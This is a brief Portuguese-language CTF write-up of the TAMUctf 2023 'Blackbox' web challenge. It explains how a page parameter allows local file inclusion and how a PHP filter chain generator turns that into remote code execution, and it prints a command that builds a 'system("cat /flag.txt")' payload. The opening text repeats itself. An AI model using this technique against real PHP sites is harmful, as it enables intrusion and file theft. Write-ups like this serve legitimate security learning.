TAMUctf 2023- Blackbox Writeup
May 01 2023
Este desafio foi criado pelo Sr. Blade. Podemos ver que ele carrega a página de login com o parâmetro da página.
Este desafio é criado por Mr. Blade

Podemos ver que ele carrega a página de login com o parâmetro de página .
Vamos enumerar os arquivos. Eu tentei admin primeiro e usei codificadores base64.

Quando decodificarmos isso, podemos obter o caminho para o flag.txt
<center>
<h1><?php include('/flag.txt'); ?></h1>
</center>
estou usandohttps://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
para obter RCE.
python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Obrigado por ler.
Feliz Hacking!